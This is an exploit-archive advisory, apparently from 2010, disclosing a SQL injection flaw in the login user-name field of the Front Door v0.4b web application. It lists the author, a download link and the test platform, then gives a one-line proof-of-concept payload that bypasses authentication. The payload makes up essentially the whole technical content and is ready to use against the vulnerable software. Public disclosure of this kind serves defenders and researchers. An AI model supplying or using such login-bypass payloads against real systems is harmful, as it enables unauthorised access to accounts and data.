Front Door v0.4b SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Front Door v0.4b SQL Injection Vulnerability
# Published : 2010-03-14
# Author : Blake
# Previous Title : BigForum Version: 4.5 SQL INJECTION
# Next Title : DesktopOnNet 3 Beta9 Local File Include Vulnerability

# Software Link: http://sourceforge.net/projects/frontdoor/files/Front%20Door%20-%20BETA/Front%20Door%20-%20v0.4b/frontdoor-v0.4b.rar/download
# Version: 0.4b
# Tested on: Windows XP SP3 with MySQL


Login user name field is vulnerable to sql injection.
POC:
' OR username IS NOT NULL OR username = '